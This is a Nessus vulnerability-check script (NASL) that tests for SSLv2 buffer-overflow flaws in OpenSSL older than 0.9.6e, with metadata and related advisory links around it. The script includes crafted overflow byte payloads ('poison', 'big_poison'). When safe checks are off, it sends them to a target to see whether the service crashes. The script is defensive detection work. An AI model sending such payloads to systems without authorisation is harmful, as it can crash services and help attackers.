Lucene search
This script is Copyright (C) 2002-2020 Solar Eclipse / Renaud DeraisonOPENSSL_OVERFLOW_GENERIC_TEST.NASLHistoryAug 05, 2002 - 12:00 a.m.
OpenSSL < 0.9.6e / 0.9.7b3 Multiple Remote Vulnerabilities
2002-08-0500:00:00
This script is Copyright (C) 2002-2020 Solar Eclipse / Renaud Deraison
www.tenable.com
392
The remote service seems to be using a version of OpenSSL that is older than 0.9.6e or 0.9.7-beta3.
Such versions are affected by a buffer overflow that may allow an attacker to execute arbitrary commands on the remote host with the privileges of the application itself.
#TRUSTED 0c735fb6d18b92e7dc463c39c93d50b398065651cd7c0ed318a5d1d34834031824c3a22050ca6e31fbcc01030a07f38ce398a73c4434f40cb325e945345c784571586ec7573bbad8187a83596ed8318eaf6fbe29658c28bbe29b37b708585e162f200a9dc8e3bb88b92c4ed92cc2ba1f3a809c28160e7ce5f02d05b54fe911864cb36397a0a6c7db4ce53e6c12d096326a0b0727e3f007c5b916a75245b03a0c89887f2a18c581d7a4c49d88672878280dc6da584f38fcfb32d39750cece204f7a4cdd4d8e5a18bc563660825d4db1ee613352088fdc75b46c9dade84128772db6b409a5b09ed95b3156e4175c6d66dea8e2f1aa3db4e4c723621cec8449ba4b4869188c9e4687fd548a2c19c20bfc66382490a21d71e882380baf0c6c9b33b4382c5ce2683444bf2988676a4abe4e2865c6782ef082ebcf0ad497a1cc0c9cb35128ba8c71af2eb86b143e720d1e461e6556cd4385e503f30cea015f9d8bbaf86087917e85775f1a89b32e0323aab41988798789ba048a32d1fda6103fee96f4c882cd51ed5020991e252eee40c145fcce7c754df18a8cac345a4b4d20a503ac645e70005c5f48de74f07b68ac07b51bb6d8c05de995db8b389dce0ca9e57291b3e43a0218c94628387c12c67ba32cf4beff50a54372c43eab3040569ff783cba5fbb9ed40b3996e373be2aeec209568a4832fd3fe0d490a0857f942f69a71b9
#
# (C) Tenable Network Security, Inc.
#
# Thanks to Solar Eclipse <[email protected]>, who did most
# of the work.
#
# Will incidentally cover CVE-2001-1141 and CVE-2000-0535
#
include("compat.inc");
if (description)
{
script_id(11060);
script_version("1.61");
script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/12");
script_cve_id(
"CVE-2000-0535",
"CVE-2001-1141",
"CVE-2002-0655",
"CVE-2002-0656",
"CVE-2002-0657",
"CVE-2002-0659"
);
script_bugtraq_id(1340, 3004, 5361, 5362, 5363, 5364, 5366);
script_xref(name:"SuSE", value:"SUSE-SA:2002:033");
script_name(english:"OpenSSL < 0.9.6e / 0.9.7b3 Multiple Remote Vulnerabilities");
script_summary(english:"Checks for the behavior of OpenSSL");
script_set_attribute(attribute:"synopsis", value:
"The remote service uses a library that is affected by a buffer
overflow vulnerability.");
script_set_attribute(attribute:"description", value:
"The remote service seems to be using a version of OpenSSL that is
older than 0.9.6e or 0.9.7-beta3.
Such versions are affected by a buffer overflow that may allow an
attacker to execute arbitrary commands on the remote host with the
privileges of the application itself.");
script_set_attribute(attribute:"solution", value:"Upgrade to OpenSSL version 0.9.6e / 0.9.7beta3 or later.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"exploit_framework_core", value:"true");
script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
script_set_attribute(attribute:"canvas_package", value:'CANVAS');
script_set_attribute(attribute:"plugin_publication_date", value:"2002/08/05");
script_set_attribute(attribute:"patch_publication_date", value:"2002/07/30");
script_set_attribute(attribute:"vuln_publication_date", value:"2001/07/10");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:openssl:openssl");
script_end_attributes();
script_category(ACT_MIXED_ATTACK);
script_copyright(english:"This script is Copyright (C) 2002-2020 Solar Eclipse / Renaud Deraison");
script_family(english:"Gain a shell remotely");
script_dependencies("ssl_supported_versions.nasl");
script_require_keys("SSL/Supported");
exit(0);
}
include("byte_func.inc");
include("ftp_func.inc");
include("global_settings.inc");
include("kerberos_func.inc");
include("ldap_func.inc");
include("misc_func.inc");
include("nntp_func.inc");
include("smtp_func.inc");
include("ssl_funcs.inc");
include("telnet2_func.inc");
if ( safe_checks() && report_paranoia < 2 ) exit(0);
#------------------------------ Consts ----------------------#
client_hello = raw_string(
0x80, 0x31, 0x01, 0x00,
0x02, 0x00, 0x18,0x00,
0x00, 0x00, 0x10,0x07,
0x00, 0xC0, 0x05, 0x00,
0x80, 0x03, 0x00, 0x80,
0x01, 0x00, 0x80, 0x08,
0x00, 0x80, 0x06, 0x00,
0x40, 0x04, 0x00, 0x80,
0x02, 0x00, 0x80, 0xE4,
0xBD, 0x00, 0x00, 0xA4,
0x41, 0xB6, 0x74, 0x71,
0x2B, 0x27, 0x95, 0x44,
0xC0, 0x3D, 0xC0);
poison = raw_string(
0x80,0x5a,0x2,0x7,
0x0,0xc0,0x0,0x0,
0x0,0x40,0x0,0x10,
0x19,0x53,0xf,0x55,
0x5e,0xaa,0x68,0x71,
0x3,0x27,0x4,0x5a,
0x1f,0x5,0xea,0x33,
0x29,0x5b,0xb9,0x3f,
0x7d,0x28,0xe6,0x4c,
0xd4,0xb3,0x8e,0x36,
0x44,0xb5,0x86,0x6c,
0x6c,0x6,0xc1,0x5c,
0x45,0x73,0xb8,0x11,
0x55,0x23,0x3e,0x2a,
0x52,0xe0,0x52,0x30,
0xda,0xf8,0xee,0x15,
0x79,0xe1,0x3c,0x68,
0x36,0xd1,0x14,0x26,
0xae,0xd4,0x30,0x2,
0x0,0x0,0x0,0x0,
0x4,0x0,0x0,0x0,
0x41,0x41,0x41,0x41,
0x41,0x41,0x41,0x41);
big_poison = raw_string(
0x81, 0xca, 0x2, 0x7,
0x0, 0xc0, 0x0, 0x0,
0x0, 0x40, 0x1, 0x80,
0xa4, 0x20, 0xb4, 0x44,
0xd, 0xe, 0x7c, 0x5,
0xc2, 0x21, 0x28, 0x4d,
0xd3, 0xab, 0x6b, 0x72,
0x10, 0xa3, 0x64, 0x7e,
0x9, 0x7e, 0xe8, 0x28,
0xe, 0x98, 0x5a, 0x5,
0x2f, 0x32, 0xbb, 0xa,
0x3c, 0xe0, 0x58, 0x5a,
0xc5, 0xf1, 0x91, 0x36,
0x1a, 0x27, 0x2c, 0x37,
0x4b, 0xc2, 0xd2, 0x49,
0x28, 0xc4, 0xf1, 0x76,
0x41, 0xe5, 0xa4, 0x2d,
0xe6, 0x9a, 0x55, 0x7e,
0x27, 0x38, 0x89, 0x13,
0x0, 0x0, 0x0, 0x0,
0x4, 0x0, 0x0, 0x0,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41);
#-------- The code. We need the check what happens on each port ------------#
moderate_report =
"Note that since safe checks are enabled, this check might be fooled by
non-openssl implementations and produce a false positive.
In doubt, re-execute the scan without the safe checks";
get_kb_item_or_exit("SSL/Supported");
port = get_ssl_ports(fork:TRUE);
if (isnull(port))
exit(1, "The host does not appear to have any SSL-based services.");
# Find out if the port is open.
if (!get_port_state(port))
exit(0, "Port " + port + " is not open.");
# Connect to the port, issuing the StartTLS command if necessary.
soc = open_sock_ssl(port);
if (!soc)
exit(1, "open_sock_ssl() returned NULL for port " + port + ".");
send(socket:soc, data:client_hello);
buf = recv(socket:soc, length:8192);
if(!strlen(buf))exit(0);
send(socket:soc, data:poison);
buf = recv(socket:soc, length:10);
close(soc);
if(safe_checks())
{
if(strlen(buf) > 5)security_hole(port:port, extra: moderate_report);
}
else
{
if(strlen(buf) > 5)
{
# Connect to the port, issuing the StartTLS command if necessary.
soc = open_sock_ssl(port);
if (!soc)
exit(1, "open_sock_ssl() returned NULL for port " + port + ".");
send(socket:soc, data:client_hello);
buf = recv(socket:soc, length:8192);
if(!strlen(buf))exit(0);
n = send(socket:soc, data:big_poison);
if ( n != strlen(big_poison) ) exit(0);
buf = recv(socket:soc, length:4096);
close(soc);
if(strlen(buf) == 0)security_hole(port);
}
}
References
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0535
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1141
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0655
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0656
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0657
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0659
Related
debian
debian
[SECURITY] [DSA-136-3] Multiple OpenSSL problems (update)
2002-09-17 00:00:00
[SECURITY] [DSA-136-2] Multiple OpenSSL problems (update)
2002-09-15 00:00:00
[SECURITY] [DSA-136-1] Multiple OpenSSL problems
2002-07-30 00:00:00
cert
cert
securityvulns
securityvulns
Advisory CA-2002-23 Multiple Vulnerabilities In OpenSSL
2002-07-31 00:00:00
RUS-CERT Advisory 2002-08:01: Incorrect integer overflow detection in C code
2002-08-08 00:00:00
suse
suse
buffer overflow in openssl/Slapper worm
2002-09-20 07:48:45
remote command execution in openssl
2002-07-30 17:22:01
osv
osv
openssl - multiple remote exploits
2002-07-30 00:00:00
nessus
nessus
Debian DSA-136-1 : openssl - multiple remote exploits
2004-09-29 00:00:00
OpenSSL < 0.9.6e Multiple Vulnerabilities
2012-01-04 00:00:00
Mandrake Linux Security Advisory : openssl (MDKSA-2002:046-1)
2004-07-31 00:00:00
openvas
openvas
OpenSSL SSL2 <= 0.9.6d / 0.9.7 <= 0.9.7-beta2 Multiple Vulnerabilities
2016-11-26 00:00:00
OpenSSL <= 0.9.4 Weak Key Vulnerability
2020-11-09 00:00:00
OpenSSL < 0.9.6b Information Disclosure Vulnerability
2020-11-06 00:00:00
cve
cve
checkpoint_advisories
checkpoint_advisories
exploitdb
exploitdb
OpenSSL SSLv2 - Malformed Client Key Remote Buffer Overflow Vulnerability 2
2002-07-30 00:00:00
canvas
canvas
Immunity Canvas: OPENSSL_KEYLEN
2002-08-12 04:00:00
debiancve
debiancve
openssl
openssl
Vulnerability in OpenSSL CVE-2002-0656
2002-07-30 00:00:00
Vulnerability in OpenSSL CVE-2002-0659
2002-07-30 00:00:00
Vulnerability in OpenSSL CVE-2002-0657
2002-07-30 00:00:00
redhat
redhat
(RHSA-2002:161) openssl security update
2003-02-06 00:00:00
packetstorm
packetstorm
opensslrv.txt
2002-07-31 00:00:00
f5
f5
K27110515 : Open SSL vulnerability CVE-2001-1141
2018-01-29 00:00:00
K79531634 : OpenSSL vulnerability CVE-2002-0655
2018-01-29 00:00:00
slackware
slackware
Security updates for Slackware 8.1
2002-07-31 13:11:28
SSA-2002-0731201128
2002-07-31 20:11:28
Related for OPENSSL_OVERFLOW_GENERIC_TEST.NASL